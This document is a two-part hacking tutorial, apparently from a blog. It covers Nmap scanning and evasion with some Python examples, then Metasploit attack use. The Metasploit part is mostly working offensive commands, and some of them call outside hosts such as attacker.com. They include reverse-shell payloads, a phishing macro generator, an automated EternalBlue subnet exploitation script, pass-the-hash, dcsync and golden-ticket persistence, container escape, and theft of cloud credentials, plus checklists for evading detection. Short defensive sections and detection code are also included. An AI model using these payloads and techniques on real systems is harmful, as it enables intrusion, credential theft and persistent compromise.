Nmap Mastery - Basic to Pro (Hack like Pro)

 

Nmap: From Basic to Pro – Scan Like a Pro

Introduction

Nmap (Network Mapper) is the de facto standard open-source network scanner, used by penetration testers, red teams, and defenders for host discovery, port scanning, service and OS fingerprinting, scripted vulnerability checks, and network mapping.

This guide takes you from basic scanning to stealthy, low-noise reconnaissance of the kind red teams use when they need results without tripping alarms, and closes with how defenders spot each technique.


Table of Contents

  1. Basic Scanning Techniques

  2. Advanced Port Scanning

  3. Service & OS Detection

  4. Stealth & Evasion Techniques

  5. Vulnerability Scanning

  6. Scripting & Automation

  7. Real-World Attack Scenarios

  8. Defensive Countermeasures


1. Basic Scanning Techniques

1.1 Simple Ping Scan (Host Discovery)

bash
nmap -sn 192.168.1.0/24
  • -sn: Skips the port scan and only does host discovery. As root on the local subnet this is an ARP sweep; against remote networks Nmap sends an ICMP echo, a TCP SYN to 443, a TCP ACK to 80, and an ICMP timestamp request. Unprivileged users get plain TCP connect probes to 80 and 443 only.

  • Use case: Quickly find live hosts in a network. Hosts that drop all of these probes are reported as down; add -Pn to scan them anyway.

1.2 Basic Port Scan

bash
nmap 192.168.1.100
  • Scans the 1,000 most common TCP ports. As root this is a SYN scan (-sS); without raw-socket privileges Nmap falls back to a full TCP connect scan (-sT), which completes the handshake and is far more likely to be logged by the service.

  • Use case: Quick recon on a single target.

1.3 Scan Specific Ports

bash
nmap -p 80,443,22 192.168.1.100
  • -p: Specifies ports as a list (80,443,22), a range (1-100), a mix (1-100,443), all ports (-p-), or per protocol when combining scan types (-sS -sU -p U:53,T:22).

  • Use case: Check for common web/SSH services.

1.4 Aggressive Scan (Comprehensive & Noisy)

bash
nmap -A 192.168.1.100
  • -A: Enables OS detection (-O), version detection (-sV), the default NSE script set (-sC), and traceroute.

  • Use case: Gather maximum info in one scan. It is neither fast nor quiet: it sends many extra probes and runs scripts against every open port, so expect IDS alerts and application log entries.


2. Advanced Port Scanning

2.1 TCP SYN Scan (Stealthy)

bash
nmap -sS 192.168.1.100
  • -sS: Half-open scan: Nmap sends a SYN, classifies the port from the SYN/ACK or RST that comes back, and tears down with a RST instead of completing the handshake. Requires raw-socket privileges (root or CAP_NET_RAW).

  • Use case: Faster than a connect scan and less likely to be logged by the application, since no connection is ever established. Firewalls and IDS still see every SYN, so this is not evasion against network monitoring.

2.2 UDP Scan (Slow but Critical)

bash
nmap -sU -p 53,161 192.168.1.100
  • -sU: Scans UDP ports (53 DNS, 161 SNMP, 67 DHCP, 123 NTP). UDP is slow because a silent port is reported as open|filtered: no reply means either open or dropped by a firewall. Add -sV so Nmap sends protocol-specific payloads that make genuinely open ports answer.

  • Use case: Find DNS servers, SNMP-speaking network gear, and IoT devices that expose nothing on TCP.

2.3 Comprehensive Scan (All Ports + Services)

bash
nmap -p- -sV -T4 192.168.1.100
  • -p-: Scan all 65,535 ports (1-65535) instead of the default top 1,000.

  • -sV: Probe service versions.

  • -T4: Aggressive timing (faster results).

2.4 Firewall Evasion (Fragmented Packets)

bash
nmap -f 192.168.1.100
  • -f: Splits the probe headers into 8-byte IP fragments (-ff for 16 bytes, --mtu for a custom multiple of 8). Only applies to raw-packet scans; it does nothing for -sT or for the real TCP connections that -sV and NSE scripts open.

  • Use case: Slip past older packet filters that inspect only the first fragment. Most current IDS/IPS and stateful firewalls reassemble fragments before inspection, so treat this as a test of the filter, not a reliable bypass.


3. Service & OS Detection

3.1 Detect OS Fingerprint

bash
nmap -O 192.168.1.100
  • -O: Guesses the target OS.

  • Use case: Identify Windows vs. Linux targets.

3.2 Detect Service Versions

bash
nmap -sV 192.168.1.100
  • -sV: Probes services (e.g., Apache 2.4.41).

  • Use case: Find outdated software for exploits.

3.3 Grab HTTP Headers (Web Servers)

bash
nmap --script http-headers -p 80,443 192.168.1.100
  • --script http-headers: Extracts server info (X-Powered-By, etc.).


4. Stealth & Evasion Techniques

4.1 Idle Scan (Zombie Scan)

bash
nmap -Pn -sI zombie_ip:port target_ip
  • -sI: Bounces the scan off an idle host (the zombie). Nmap reads the zombie's IP ID counter, sends SYNs to the target with the zombie's address spoofed as source, then reads the counter again: a jump of 2 means the target sent the zombie a SYN/ACK (port open) and the zombie answered it with a RST; a jump of 1 means closed or filtered. The zombie must be truly idle and use a global, incrementing IP ID; the ipidseq NSE script (--script ipidseq) finds candidates.

  • Use case: The target only ever sees packets from the zombie. Add -Pn so Nmap does not ping the target from your real address first. This hides the scan from the target, not from anyone watching your traffic to the zombie.
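The probe exchange behind -sI, as an added Python model that is not part of the original page or of Nmap: the Zombie, Target and idle_scan names are assumptions, the zombie's IP ID counter is simulated in memory, and the classification rule (delta of 2 is open, delta of 1 is closed|filtered) is the one Nmap applies. A noise parameter models other traffic leaving the zombie, which is the usual way this scan goes wrong.

```python
"""Model of the idle (zombie) scan behind nmap -sI: added example, not Nmap code."""
from typing import Dict, Iterable


class Zombie:
    """An idle host whose IP ID field goes up by one for every packet it sends (global counter)."""

    def __init__(self, start_ipid: int = 1000):
        self.ipid = start_ipid

    def send(self) -> int:
        """Emit one packet and return the IP ID it carried."""
        self.ipid += 1
        return self.ipid

    def on_syn_ack(self) -> None:
        """An unsolicited SYN/ACK makes a host answer with RST, which costs one IP ID."""
        self.send()

    def on_rst(self) -> None:
        """An unsolicited RST is silently dropped: no packet, no IP ID change."""


class Target:
    """Host being scanned: SYN/ACK for open, RST for closed, silence for filtered."""

    def __init__(self, open_ports: Iterable[int], filtered_ports: Iterable[int] = ()):
        self.open_ports = set(open_ports)
        self.filtered_ports = set(filtered_ports)

    def receive_syn(self, spoofed_src: Zombie, port: int) -> None:
        if port in self.filtered_ports:
            return                        # firewall drops the probe: the zombie hears nothing
        if port in self.open_ports:
            spoofed_src.on_syn_ack()      # SYN/ACK goes to the spoofed source, i.e. the zombie
        else:
            spoofed_src.on_rst()          # RST goes to the zombie, which ignores it


def probe_zombie(zombie: Zombie) -> int:
    """Attacker sends a SYN/ACK to the zombie; its RST reply reveals the current IP ID."""
    return zombie.send()


def idle_scan(zombie: Zombie, target: Target, port: int, noise: int = 0) -> str:
    """Classify one port. `noise` simulates unrelated packets the zombie sends mid-scan."""
    before = probe_zombie(zombie)
    target.receive_syn(zombie, port)      # SYN carrying the zombie's address; attacker stays silent
    for _ in range(noise):
        zombie.send()                     # a non-idle zombie corrupts the measurement
    after = probe_zombie(zombie)
    delta = after - before
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"
    return f"unreliable (IP ID moved by {delta}; zombie is not idle)"


def scan_ports(zombie: Zombie, target: Target, ports: Iterable[int]) -> Dict[int, str]:
    return {p: idle_scan(zombie, target, p) for p in ports}


if __name__ == "__main__":
    # Constructed scenario: 22 and 80 open, 25 dropped by a firewall, everything else closed.
    result = scan_ports(Zombie(), Target(open_ports={22, 80}, filtered_ports={25}), [22, 25, 80, 8080])
    for port, verdict in result.items():
        print(f"{port}/tcp {verdict}")
```

Note that a filtered port and a closed port look identical to the attacker (delta 1 in both cases): the zombie receives nothing in one case and an ignored RST in the other. That is why Nmap reports closed|filtered for idle scans.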

4.2 Randomize Hosts & Delays

bash
nmap --randomize-hosts --scan-delay 5s 192.168.1.0/24
  • --randomize-hosts: Avoids sequential scanning.

  • --scan-delay: Adds delays to evade rate-based detection.

4.3 Decoy Scan (Fake IPs)

bash
nmap -D RND:5 192.168.1.100
  • -D RND:5: Interleaves your probes with identical probes from 5 random decoy addresses, so the target's logs show six scanners. Use -D decoy1,decoy2,ME,decoy3 to choose decoys yourself and control where your real address falls in the sequence.

  • Use case: Make it harder for a SOC analyst to tell which source is real. Your own address is still in the logs, replies still come back to you, and decoys that are obviously bogus (unreachable hosts, RFC 1918 addresses on an Internet scan) give the game away. Decoys do not work with -sT or version detection, which need real connections.


5. Vulnerability Scanning

5.1 NSE (Nmap Scripting Engine)

bash
nmap --script vuln 192.168.1.100
  • --script vuln: Runs every NSE script in the vuln category (for example smb-vuln-ms17-010, http-vuln-cve2017-5638, ssl-heartbleed). These are remote checks against exposed services; a local privilege escalation such as CVE-2021-4034 (PwnKit) cannot be detected this way.

5.2 SMB Vulnerabilities Check

bash
nmap --script "smb-vuln*" -p 445 192.168.1.100
  • Quote the wildcard so the shell does not expand it against local files. Checks for MS17-010 (EternalBlue), MS08-067, MS10-054 and other SMB issues. Some of these scripts are in the intrusive category and can crash the service they test, so read each script's description before running them against production.

5.3 Heartbleed Detection

bash
nmap -p 443 --script ssl-heartbleed 192.168.1.100

6. Scripting & Automation

6.1 Save Scan Results

bash
nmap -oN scan.txt -oX scan.xml 192.168.1.100
  • -oN: Normal text output.

  • -oX: XML format; import it into Metasploit with db_import or parse it with your own tooling. -oA basename writes normal, XML and grepable (-oG) output in one run.

6.2 Scan Multiple Targets from File

bash
nmap -iL targets.txt
  • -iL: Input list of IPs/hosts.

6.3 Automate with Bash

bash
# nmap -iL ips.txt already handles a list; loop only when each target needs its own output file or options
while read -r ip; do nmap -p 22,80,443 -oN "scan_${ip}.txt" "$ip"; done < ips.txt
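For the automation section, an added Python example that is not from the page and not part of Nmap: it reads -oX output and turns it into an inventory you can filter or diff between runs. The XML is a constructed, abbreviated sample in Nmap's -oX layout, and the known_old list passed to outdated stands in for whatever end-of-life versions you track.

```python
"""Turn Nmap -oX output into a host/port inventory: added example, not part of Nmap."""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Constructed, abbreviated sample in the -oX layout (not a real scan).
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.1.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.1.100" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.41"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed" reason="reset"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.1.101" addrtype="ipv4"/>
  </host>
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.168.1.102" addrtype="ipv4"/>
    <ports>
      <port protocol="udp" portid="161">
        <state state="open|filtered" reason="no-response"/>
        <service name="snmp"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

Entry = Tuple[str, int, str, str]   # (protocol, port, state, service string)


def parse_nmap_xml(xml_text: str) -> Dict[str, List[Entry]]:
    """Return {ipv4: [entries]} for hosts Nmap reported as up; down hosts are skipped."""
    inventory: Dict[str, List[Entry]] = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue                      # IPv6-only or MAC-only entries are out of scope here
        entries: List[Entry] = []
        for port in host.findall("./ports/port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            service = ""
            if svc is not None:
                # -sV fills product/version; a plain port scan only carries the name from nmap-services
                service = " ".join(v for v in (svc.get("name"), svc.get("product"), svc.get("version")) if v)
            entries.append((port.get("protocol"), int(port.get("portid")), state, service))
        inventory[addr.get("addr")] = entries
    return inventory


def open_ports(inventory: Dict[str, List[Entry]], include_ambiguous: bool = False):
    """Flatten to (ip, proto, port, service). UDP open|filtered is included only on request:
    it means "no reply", which is also what a firewall drop looks like."""
    wanted = {"open", "open|filtered"} if include_ambiguous else {"open"}
    return [(ip, proto, port, svc)
            for ip, entries in inventory.items()
            for proto, port, state, svc in entries if state in wanted]


def outdated(inventory: Dict[str, List[Entry]], known_old: List[Tuple[str, str]]):
    """Match -sV strings against (product, version) pairs you consider end-of-life."""
    return [(ip, port, svc)
            for ip, entries in inventory.items()
            for _, port, state, svc in entries
            for product, version in known_old
            if state == "open" and product in svc and version in svc]


if __name__ == "__main__":
    inv = parse_nmap_xml(SAMPLE_XML)
    for row in open_ports(inv, include_ambiguous=True):
        print(row)
    print(outdated(inv, [("Apache httpd", "2.4.41")]))
```

Keeping open|filtered out of the default view is deliberate: on UDP that state is the absence of evidence, and feeding it into a vulnerability workflow produces false positives on every firewalled host.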

7. Real-World Attack Scenarios

Scenario 1: External Recon (Black-Box Testing)

bash
nmap -Pn -sS -p- -T4 --min-rate 1000 -oN full_scan.txt target.com
  • -Pn: Skip ping (assume host is up).

  • --min-rate 1000: Send at least 1,000 packets per second. Fast, but easy to spot, and it can overrun the target's or your own link, in which case dropped replies show up as filtered ports; rerun with a lower rate if the results look thin.

Scenario 2: Internal Pivoting

bash
nmap -sn 10.1.1.0/24          # Find live hosts  
nmap -A -p 22,80,443 10.1.1.5 # Probe services  

8. Defensive Countermeasures

How Blue Teams Detect Nmap

  • SYN scans (Unusual half-open connections).

  • Rate-based detection (Too many probes in short time).

  • Nmap’s default probes (Unique TCP flags).

How to Evade Detection

✅ Use -T2 or --scan-delay to stay under rate thresholds; the price is scan time.
✅ Fragment packets (-f) to test filters that do not reassemble; assume a modern IDS does.
✅ Use decoys (-D) to blur attribution; they do not remove your address from the logs.
✅ Scan only the ports you need (-p) and skip -A unless you need it: fewer probes, fewer alerts.
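How the rate-based detection above actually works, as an added Python example (not from the page): a sliding window counts distinct destination ports per source/destination pair, and a second rule fires on flag combinations no real client sends (NULL and Xmas probes). The log lines are constructed in an iptables-like key=value style, and the thresholds are assumptions to tune; the same constructed data shows why --scan-delay 5s slips under the window.

```python
"""SYN-sweep detection over firewall logs: added example, not from the page."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed iptables-style line format; real logs need their own regex.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<dpt>\d+) FLAGS=(?P<flags>\S*)$"
)


def parse_line(line: str):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dpt"]), m["flags"]


def sweep_lines(src: str, dst: str, ports, start_iso: str, gap_s: float, flags: str = "S") -> List[str]:
    """Construct log lines for one source hitting `ports` on `dst`, `gap_s` seconds apart."""
    t0 = datetime.fromisoformat(start_iso)
    return [
        f"{(t0 + timedelta(seconds=gap_s * i)).isoformat()} SRC={src} DST={dst} DPT={p} FLAGS={flags}"
        for i, p in enumerate(ports)
    ]


def detect_scans(lines, distinct_ports: int = 10, window_s: float = 5.0):
    """Return (scan_alerts, odd_flag_probes).

    scan_alerts: (src, dst, n) where one source touched >= distinct_ports unique ports on
                 one host inside a sliding window of window_s seconds.
    odd_flag_probes: packets with no flags (nmap -sN) or FIN+PSH+URG (nmap -sX); no normal
                 client sends these, so a single packet is enough to alert on.
    """
    probes = defaultdict(list)
    odd = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dst, dpt, flags = rec
        if flags in ("", "FPU"):
            odd.append((src, dst, dpt, flags or "NULL"))
        probes[(src, dst)].append((ts, dpt))

    alerts: List[Tuple[str, str, int]] = []
    for (src, dst), events in probes.items():
        events.sort()
        seen = defaultdict(int)   # port -> hits currently inside the window
        left = 0
        for ts, dpt in events:
            seen[dpt] += 1
            # advance the window's left edge until the oldest event fits in window_s
            while (ts - events[left][0]).total_seconds() > window_s:
                old = events[left][1]
                seen[old] -= 1
                if seen[old] == 0:
                    del seen[old]
                left += 1
            if len(seen) >= distinct_ports:
                alerts.append((src, dst, len(seen)))
                break
    return alerts, odd


if __name__ == "__main__":
    fast = sweep_lines("10.0.0.5", "192.168.1.100", range(1, 21), "2024-05-01T10:00:00", 0.05)
    slow = sweep_lines("10.0.0.7", "192.168.1.100", range(1, 21), "2024-05-01T10:00:00", 5.0)  # --scan-delay 5s
    xmas = ["2024-05-01T10:01:00 SRC=10.0.0.9 DST=192.168.1.100 DPT=445 FLAGS=FPU",
            "2024-05-01T10:01:01 SRC=10.0.0.9 DST=192.168.1.100 DPT=139 FLAGS="]
    print(detect_scans(fast + slow + xmas))
```

The slow sweep never has more than two ports inside a five-second window, so the distinct-port rule stays quiet; that is the whole effect of --scan-delay. A defender closes that gap by widening the window or by counting per source over a longer horizon, which is why slow scans trade time for a lower, not zero, chance of detection.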


Conclusion

You’ve now covered Nmap from basic scans to stealthy, low-noise reconnaissance, and seen which of those techniques a defender can still catch.

Next Steps:

  • Practice on HackTheBox & TryHackMe.

  • Learn Metasploit integration (db_nmap).

  • Explore custom NSE scripts for advanced attacks.

Disclaimer: This content is for educational purposes only.

🚀 Happy Scanning! 🚀

The Ultimate Metasploit Mastery Guide: Advanced to Pro, Part 2

 

Metasploit: From Advanced to Pro – Exploit Like a Nation-State Hacker

Introduction

You’ve mastered the basics of Metasploit—now it’s time to operate like a professional penetration tester or red teamer. This guide dives into advanced exploitation, evasion, automation, and real-world attack chains with detailed command breakdowns.


Table of Contents

  1. Advanced Exploit Customization

  2. Stealthy Payloads & Evasion

  3. Post-Exploitation Mastery

  4. Lateral Movement & Pivoting

  5. Automation & API Integration

  6. Real-World Attack Walkthroughs

  7. Defensive Countermeasures


1. Advanced Exploit Customization

Manual Exploit Tweaking

Sometimes, public exploits fail due to custom environments, patches, or mitigations. Here’s how to adapt them:

Example: Modifying a Public Exploit

  1. Locate the exploit and copy it into your user module tree. Metasploit only loads modules from its configured module paths, so a copy dropped in your home directory is ignored:

    bash
    locate ms17_010_eternalblue.rb
    mkdir -p ~/.msf4/modules/exploits/custom
    cp /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb ~/.msf4/modules/exploits/custom/eternalblue.rb
  2. Edit the copy. What you change depends on the module: offsets, groom or overflow parameters, target entries, or the shellcode. The snippet below is an illustrative target entry; use the field names the module you copied already defines:

    ruby
    # Illustrative target definition: add or adjust an entry for the build you are facing
    'Targets' => [
      [ 'Windows 10 x64', { 'Ret' => 0x0000000140000000 } ]
    ]
  3. Reload and select it. The module name follows the directory layout under ~/.msf4/modules:

    bash
    reload_all
    use exploit/custom/eternalblue

Key Exploit Options

bash
set VERBOSE true                # Debugging output
check                           # Run the module's check method to confirm the target is vulnerable before exploiting
set DisablePayloadHandler true  # Use an external listener instead of starting one in this module

2. Stealthy Payloads & Evasion

AV/EDR Bypass Techniques

1. Polymorphic Encoding

bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe -o payload_encoded.exe
  • The encoder must match the payload architecture: x86/shikata_ga_nai only encodes x86 payloads. For windows/x64 payloads pick an x64 encoder such as x64/xor_dynamic (msfvenom -l encoders lists them).

  • -i 10: Iterate encoding 10 times.

  • -f exe: Output format.

  • Encoders exist to avoid bad characters, not to beat AV. Every engine emulates shikata_ga_nai, so an encoded payload in the default template is detected on sight; real evasion needs a custom loader or template (-x) and a non-default C2 channel.

2. Process Injection (Run Inside a Legitimate Process)

bash
# From an existing Meterpreter session: move into another process (list candidates with ps)
migrate 1234          # Target PID (e.g., explorer.exe)

# Or start a second payload inside a chosen process
use post/windows/manage/payload_inject
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_https
set PID 1234
run

3. HTTPS Beaconing (C2 Obfuscation)

bash
set payload windows/x64/meterpreter/reverse_https
set LHOST secure.c2server.com
set LPORT 443
set HandlerSSLCert /path/to/cert.pem     # PEM holding key and certificate; pair with StagerVerifySSLCert true so the stager only talks to this cert

3. Post-Exploitation Mastery

Privilege Escalation (Windows)

1. Token Impersonation

bash
load incognito
list_tokens -u                              # Seeing other users' tokens needs SeImpersonatePrivilege (admin or a service account)
impersonate_token "NT AUTHORITY\\SYSTEM"    # Backslash is escaped; a delegation token from the list above also works

2. Kernel Exploits

bash
# Check vulnerability
run post/multi/recon/local_exploit_suggester

# Exploit (e.g., PrintNightmare); confirm the exact module path in your install with: search printnightmare
use exploit/windows/local/cve_2021_1675_printspooler
set SESSION 1
exploit

Linux Privilege Escalation

bash
# SUID Finder (run in the target's shell)
find / -perm -4000 -type f 2>/dev/null

# Exploit Dirty Pipe (CVE-2022-0847)
use exploit/linux/local/cve_2022_0847_dirtypipe
set SESSION 2
exploit

4. Lateral Movement & Pivoting

1. Pass-the-Hash (SMB)

bash
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.20
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  # LM:NT pair; this sample is the hash of an empty password, substitute the dumped one
exploit
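What SMBPass actually carries, as an added Python example that is not Metasploit code: the NT half of the LM:NT pair is MD4 over the UTF-16LE password with no salt and no per-host value, which is exactly why the hash alone authenticates over SMB. MD4 is written out in full because hashlib.new('md4') depends on OpenSSL's legacy provider and is missing on many systems. The password strings are constructed test inputs; md4, nt_hash and smbpass_value are names chosen for this example.

```python
"""NT hash computation for the LM:NT value psexec takes in SMBPass: added example, not Metasploit code."""
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, implemented here so the example runs without OpenSSL's legacy provider."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)   # bit length, little-endian

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        # (mixing function, additive constant, message-word order, shift amounts)
        (lambda p, q, r: (p & q) | (~p & r), 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (lambda p, q, r: (p & q) | (p & r) | (q & r), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda p, q, r: p ^ q ^ r, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for f, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                s = shifts[i % 4]
                # each step rotates the register roles: a, d, c, b
                if i % 4 == 0:
                    a = _rotl((a + f(b, c, d) + x[idx] + k) & MASK, s)
                elif i % 4 == 1:
                    d = _rotl((d + f(a, b, c) + x[idx] + k) & MASK, s)
                elif i % 4 == 2:
                    c = _rotl((c + f(d, a, b) + x[idx] + k) & MASK, s)
                else:
                    b = _rotl((b + f(c, d, a) + x[idx] + k) & MASK, s)
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). No salt, so the hash is itself a reusable credential."""
    return md4(password.encode("utf-16-le")).hex()


# LM hash of an empty (or disabled) LM password; modern hosts store this constant in the LM slot.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def smbpass_value(password: str) -> str:
    """Format as Metasploit's SMBPass expects: LM:NT."""
    return f"{EMPTY_LM}:{nt_hash(password)}"


if __name__ == "__main__":
    # Constructed inputs: the empty password reproduces the hash shown in the psexec example above.
    for pw in ("", "password"):
        print(repr(pw), "->", smbpass_value(pw))
```

Two consequences follow directly from the construction. First, every account with the same password has the same NT hash across the whole domain, so one dumped hash may open many hosts. Second, because the value is a plain unsalted digest, the page's sample SMBPass is not an arbitrary placeholder but the empty-password hash, which is worth knowing when you see it in a real dump.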

2. RDP Session Hijacking

bash
# List console and RDP sessions from a shell on the host
shell
query user

# Attach a disconnected user's session to your own (requires SYSTEM); no password needed
tscon <SESSION_ID> /dest:<YOUR_SESSION_NAME>

# Related, from Meterpreter: take the access token of a process the target user owns
steal_token <PID>

3. Pivoting (Route Through Compromised Host)

bash
# Add route
run autoroute -s 10.1.1.0/24

# Scan internal network
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.1.1.1-254
run

5. Automation & API Integration

1. Metasploit Resource Scripts

bash
# auto_pwn.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.0/24
set THREADS 10
set PAYLOAD windows/x64/meterpreter/reverse_https
exploit -j

Run with:

bash
msfconsole -r auto_pwn.rc

2. Python Automation (MSFRPC)

python
# Legacy SpiderLabs msfrpc client. Start the daemon first, e.g.
#   msfrpcd -U msf -P password -p 55553 -S    (-S disables TLS, which this plain-HTTP client expects)
# pymetasploit3 is the maintained alternative if you are starting fresh.
import msfrpc

client = msfrpc.Msfrpc({'host': '127.0.0.1', 'port': 55553})
client.login('msf', 'password')
# Launch psexec; the third element is the module's option hash (credentials included)
exploit = client.call('module.execute', ['exploit', 'windows/smb/psexec', {
    'RHOSTS': '192.168.1.10',
    'SMBUser': 'Administrator',
    'SMBPass': 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0',
    'PAYLOAD': 'windows/meterpreter/reverse_tcp',
    'LHOST': '10.0.0.5'
}])
print(exploit)   # response identifies the job that was started

6. Real-World Attack Walkthroughs

Scenario 1: Phishing → Exploit → Domain Admin

  1. Send malicious Office macro:

    bash
    msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com -f vba -o macro.txt
  2. Gain initial access:

    bash
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    exploit
  3. Escalate to Domain Admin, then persist. dcsync needs replication rights (Domain Admin or equivalent), so local privilege escalation and credential theft come first; once you hold those rights, pull the krbtgt hash and forge a golden ticket:

    bash
    load kiwi
    dcsync_ntlm krbtgt
    golden_ticket_create -d DOMAIN -u FAKEUSER -s S-1-5-21-... -k <KRBTGT_NTLM_HASH> -t ticket.kirbi
    kerberos_ticket_use ticket.kirbi

Scenario 2: Web App → Docker Escape → Cloud Compromise

  1. Exploit vulnerable web app:

    bash
    use exploit/multi/http/struts2_code_exec
    set RHOSTS app.target.com
    exploit
  2. Break out of container:

    bash
    checkcontainer  # Meterpreter: reports whether the session is inside a container
    search docker   # Pick the escape module that matches the misconfiguration (privileged container, mounted docker socket, ...)
    run post/linux/escalate/docker_escape
  3. Steal cloud credentials. /proc/self/environ is NUL-separated, so convert it before grepping; on an EC2 host also ask the instance metadata service for the instance role's keys:

    bash
    tr '\0' '\n' < /proc/self/environ | grep AWS_
    # IMDSv1; with IMDSv2 enforced you must first PUT /latest/api/token and send it as X-aws-ec2-metadata-token
    curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

7. Defensive Countermeasures

How Blue Teams Detect Metasploit

  • Network signatures: Meterpreter’s HTTP/S beaconing.

  • Process anomalies: unexpected parent/child pairs on the victim, such as an Office document spawning PowerShell, a service spawning cmd.exe (psexec), or Meterpreter migrating into explorer.exe.

  • Log anomalies: Rapid SMB login attempts.
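The first bullet in practice, as an added Python example that is not from the page: a proxy log is constructed inline with one host calling secure.c2server.com (the hostname from section 2) about once a minute with small jitter and one host browsing irregularly; the detector groups connections by (src, dst) and flags pairs whose inter-arrival times have a low coefficient of variation. The min_hits and max_cv thresholds are assumptions to tune.

```python
"""Flag periodic outbound connections (C2 beaconing) in a proxy log: added example, not from the page."""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Tuple

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>\S+) (?P<method>[A-Z]+) (?P<uri>\S+)$")


def constructed_log() -> List[str]:
    """Build a small proxy log: one beaconing host, one human browsing (all constructed)."""
    lines = []
    t0 = datetime(2024, 5, 1, 9, 0, 0)
    # Beacon: a callback every ~60 s with a little jitter, fixed host, rotating URI.
    jitter = [0, 1, -2, 2, -1, 0, 1, -1, 2, 0, -1, 1]
    t = t0
    for i, j in enumerate(jitter):
        t += timedelta(seconds=60 + j)
        lines.append(f"{t.isoformat()} 10.0.0.23 -> secure.c2server.com GET /api/v1/{i:04d}")
    # Human: irregular gaps between requests to the same site.
    gaps = [3, 45, 2, 300, 8, 120, 1, 600, 15, 90, 30, 5]
    t = t0
    for i, g in enumerate(gaps):
        t += timedelta(seconds=g)
        lines.append(f"{t.isoformat()} 10.0.0.41 -> news.example.org GET /story/{i}")
    return lines


def beacon_candidates(lines, min_hits: int = 8, max_cv: float = 0.2) -> List[Tuple[str, str, int, float]]:
    """Return (src, dst, hits, cv) for pairs whose inter-arrival times are suspiciously regular.

    cv is the coefficient of variation (stdev / mean) of the gaps between connections:
    near zero for a fixed-interval beacon, large for a person clicking around.
    """
    times = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            times[(m["src"], m["dst"])].append(datetime.fromisoformat(m["ts"]))

    out = []
    for (src, dst), ts in times.items():
        if len(ts) < min_hits:
            continue                       # too few samples to call anything periodic
        ts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            out.append((src, dst, len(ts), round(cv, 3)))
    return out


if __name__ == "__main__":
    for src, dst, hits, cv in beacon_candidates(constructed_log()):
        print(f"beacon? {src} -> {dst}: {hits} connections, cv={cv}")
```

Encryption does not hide this signal: the detector never looks at content, only at timing, which is why the evasion checklist below pairs HTTPS with jitter. A beacon with a large randomised sleep raises the cv above the threshold, at the cost of a slower, less responsive implant.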

Evasion Checklist

✅ Use encrypted, legitimate-looking channels (HTTPS with a real certificate, DNS tunneling) and add jitter to beacon timing.
✅ Avoid default Meterpreter (Customize C2 channels, templates and transports).
